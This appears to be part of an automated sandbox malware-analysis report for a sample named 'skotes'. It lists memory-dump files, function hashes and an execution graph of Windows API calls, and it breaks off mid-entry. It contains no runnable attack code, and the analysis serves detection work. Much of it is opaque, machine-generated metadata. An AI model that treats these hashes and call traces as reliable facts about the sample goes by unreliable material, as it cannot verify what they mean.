                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID: T2v
                                                                                                                                                                                                • API String ID: 1464230837-3236093702
                                                                                                                                                                                                • Opcode ID: 34c26f510ca38ce6cfd6a48f596fd826e26df4781ececdbad0ebff365d886d05
                                                                                                                                                                                                • Instruction ID: d2faa54c7e04d4a626667ee38026e88c3e2cd227759ce5005456df049fa14e4e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 34c26f510ca38ce6cfd6a48f596fd826e26df4781ececdbad0ebff365d886d05
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C213732714300EBEB189B68DD8976DF7A2EB96310F248319E4089B6D5D77E59808692

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 0073CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                • String ID: vs
                                                                                                                                                                                                • API String ID: 3213747228-1415080554
                                                                                                                                                                                                • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                • Instruction ID: 7454203cfebc5b4423e47089436841ece223c7b07525015798c0c9c73cd7d29b
                                                                                                                                                                                                • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                • Instruction Fuzzy Hash: 99B12632A056959FEB16CF28C8817BEBBE5EF45350F1481AAE855FB243D63C9D01CB60
                                                                                                                                                                                                Function 00702EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Mtx_unlock
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1418687624-0
                                                                                                                                                                                                • Opcode ID: 176b8f014cfda3b0214fe5626e52320dd7bda6d0ff9d1050a17880569a50510c
                                                                                                                                                                                                • Instruction ID: 6a4de5e1f45376f0f3577350a813d02894bafb43e700e82f035baff92eb8935e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 176b8f014cfda3b0214fe5626e52320dd7bda6d0ff9d1050a17880569a50510c
                                                                                                                                                                                                • Instruction Fuzzy Hash: B1A11371A01615DFDB11DFA8C84979AB7F8FF19310F048229E815D72C1EB39EA44CB91
                                                                                                                                                                                                Function 0073F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ___free_lconv_mon
                                                                                                                                                                                                • String ID: 8"v$`'v
                                                                                                                                                                                                • API String ID: 3903695350-1043468348
                                                                                                                                                                                                • Opcode ID: 89fdeab5f3b432f4330bcfea05ab53415570d34b11da0598c63cc12f00ed22e5
                                                                                                                                                                                                • Instruction ID: 5de98f2da1d1122bf2bb9e518e3043506b10a6d6f42d29f1b9778c56aec88058
                                                                                                                                                                                                • Opcode Fuzzy Hash: 89fdeab5f3b432f4330bcfea05ab53415570d34b11da0598c63cc12f00ed22e5
                                                                                                                                                                                                • Instruction Fuzzy Hash: F1313032A01642EFFB21AA39D84AB5B73E4EF00391F14442AE495D759BDF79EC80C711

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:1.4%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                Signature Coverage:4.8%
                                                                                                                                                                                                Total number of Nodes:1218
                                                                                                                                                                                                Total number of Limit Nodes:8
                                                                                                                                                                                                execution_graph 5463 4010b0 5464 401110 5463->5464 5465 4010bf 5463->5465 5467 40112e WriteFile 5464->5467 5474 401109 5464->5474 5466 4010dc WriteConsoleA 5465->5466 5470 4010e3 5465->5470 5469 401100 5466->5469 5468 401135 5467->5468 5469->5468 5472 401104 5469->5472 5471 4010f0 WriteConsoleW 5470->5471 5471->5469 5475 401057 5472->5475 5474->5464 5474->5467 5476 401078 WriteFile 5475->5476 5477 401069 5475->5477 5478 40108c 5476->5478 5477->5476 5477->5478 5478->5474 5479 402a30 SetUnhandledExceptionFilter GetStdHandle 5550 402981 GetVersionExA 5479->5550 5481 402a4b 5559 403e0e 5481->5559 5484 402a8e 5562 403ea0 5484->5562 5486 402a57 5486->5484 5493 402a59 5486->5493 5488 402af4 5491 403ea0 2 API calls 5488->5491 5492 402af9 5491->5492 5499 401c3e 3 API calls 5492->5499 5493->5488 5591 401c3e 5493->5591 5503 402b03 5499->5503 5500 402a90 5602 401c8e 5500->5602 5501 402a72 5501->5488 5504 402a84 5501->5504 5506 402b2e 5503->5506 5522 402b05 5503->5522 5598 4011c1 5504->5598 5678 401cfe GetFileSize 5506->5678 5508 402a95 5508->5484 5612 403e34 5508->5612 5509 402b57 5510 402ba4 ExitProcess 5509->5510 5513 402b79 5509->5513 5514 402b6a Beep 5509->5514 5512 402b1d 5525 4011c1 4 API calls 5512->5525 5517 402b8c 5513->5517 5520 40113f 4 API calls 5513->5520 5514->5513 5516 402b33 5516->5484 5519 402b35 5516->5519 5687 402463 5516->5687 5521 402b9f 5517->5521 5523 40113f 4 API calls 5517->5523 5519->5484 5519->5516 5520->5517 5521->5510 5522->5512 5524 4011c1 4 API calls 5522->5524 5523->5521 5524->5512 5528 402b2c 5525->5528 5528->5484 5531 402aaa 5620 4081c5 5531->5620 5539 402ac0 5647 401d96 5539->5647 5542 403ea0 2 API calls 5543 402aca 5542->5543 5544 40295b 5 API calls 5543->5544 5545 402acf 5544->5545 5545->5484 5545->5519 5656 40153c 5545->5656 5547 402ae6 5547->5519 5548 402ae8 5547->5548 5670 40113f 5548->5670 5551 402980 5550->5551 5552 402998 GetModuleHandleA GetProcAddress 5550->5552 5551->5481 5553 4029b3 GetProcAddress 5552->5553 5558 402a23 5552->5558 5554 4029c7 GetProcAddress 5553->5554 5553->5558 5555 4029db GetProcAddress 5554->5555 5554->5558 5556 4029ef GetProcAddress 5555->5556 5555->5558 5557 402a03 LoadLibraryA GetProcAddress 5556->5557 5556->5558 5557->5558 5558->5481 5711 403dd8 VirtualAlloc 5559->5711 5561 402a50 5561->5484 5578 4019d3 GetCommandLineW lstrlenW 5561->5578 5717 403e80 5562->5717 5565 403ecc 5566 403e80 2 API calls 5565->5566 5567 402b4d 5566->5567 5568 403eb6 5567->5568 5569 403e80 2 API calls 5568->5569 5570 402b52 5569->5570 5571 40295b 5570->5571 5572 402964 5571->5572 5573 40297a 5571->5573 5575 403e80 2 API calls 5572->5575 5720 402912 5573->5720 5577 40296f 5575->5577 5577->5509 5727 4080e4 5578->5727 5580 401adb 5580->5486 5581 40113f 4 API calls 5581->5580 5582 401a03 5584 401a63 5582->5584 5585 401a8f 5582->5585 5731 401819 5582->5731 5741 401717 5582->5741 5584->5580 5584->5581 5585->5584 5589 401aea 5585->5589 5587 401b2d 5587->5486 5588 40113f 4 API calls 5590 401bd2 5588->5590 5589->5587 5589->5588 5590->5486 5592 401c4c 5591->5592 5593 401c5a 5592->5593 5993 401bdb 5592->5993 5595 401c76 CreateFileW 5593->5595 5596 401c7e CreateFileA 5593->5596 5597 401c83 5595->5597 5596->5597 5597->5500 5597->5501 5599 4011cb 5598->5599 5600 40113f 4 API calls 5599->5600 5601 4011eb 5600->5601 5601->5484 5603 